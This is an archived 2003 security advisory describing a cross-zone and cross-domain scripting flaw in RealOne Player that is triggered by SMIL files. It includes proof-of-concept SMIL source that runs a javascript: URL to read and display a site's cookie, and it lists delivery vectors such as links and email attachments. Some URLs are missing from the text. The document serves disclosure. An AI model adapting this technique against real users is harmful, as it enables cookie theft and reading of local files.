Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Windows Net Apps :: bt949.txt

RealOne Player Allows Cross Zone and Domain Access

DigitalPranksters Security Advisory

RealOne Player Allows Cross Zone and Domain Access

Risk: High

Product: RealOne Player (English only), RealOne Player v2 for Windows (all 
languages), and RealOne Enterprise Desktop (all versions, standalone and 
as configured by RealOne Desktop Manager).

Product URL:

Vendor Contacted: July 1, 2003

Vendor Released Patch: August 19, 2003

DigitalPranksters Public Advisory Released: August 27, 2003

Found by: KrazySnake ( 

Using a SMIL presentation, an attacker can instruct the RealOne player to 
load a series of URLs. If the attacker specifies a scripting protocol as 
the URL, the script executes in the context of the previous URL. This 
allows the attacker access to everything the previous URL had access to. 
For example, an attacker could load a file on the local machine (C: drive) 
through the SMIL and then load script into the "my computer" zone to read 
content from the local hard disk. It also allows the attack to script web 
sites and steal cookies. 
We feel this is a high risk because there is no prompt before opening a 
SMIL file. This allows the attacker to open the maliciously created file 
without the victim's intent. We have identified several potential attack 
vectors. These include linking to the SMIL over HTTP through link (A 
HREF="malicious.smil"), javascript (document.location="malicious.smil"), 
and email attachments. 

Proof of concept:
We have created a SMIL file that will read the cookie from The cookie will be read 9 seconds 
after the audio has begun.

Source Code:
<smil xmlns="" 
  <meta name="title" content=" Proof of Concept"/>
  <meta name="author" content=""/>
  <meta name="copyright" content="(c)2003"/>
   <area href="" begin="1s" 
external="true" actuate="onLoad" sourcePlaystate="play" 
    <rn:param name="width" value="10"/>
    <rn:param name="height" value="10"/>
   <area href="javascript:alert('Hi there!  I\'m a digital prankster.  I 
just read your cookie from ' + document.domain + ' over the ' + 
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie + 
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad" 
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>

RealNetworks released a security update to address this issue. The 
security update and details of this update from RealNetworks are available 

Harmo and HTMLBCat.
Thanks to RealNetworks for fixing this issue.

Standard disclaimer applies. The opinions expressed in this advisory are 
our own and not of any company. The information within this advisory may 
change without notice. Use of this information constitutes acceptance for 
use in an AS IS condition. There are no warranties with regard to this 
information. In no event shall the author be liable for any damages 
whatsoever arising out of or in connection with the use or spread of this 
information. Any use of this information is at the user's own risk.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH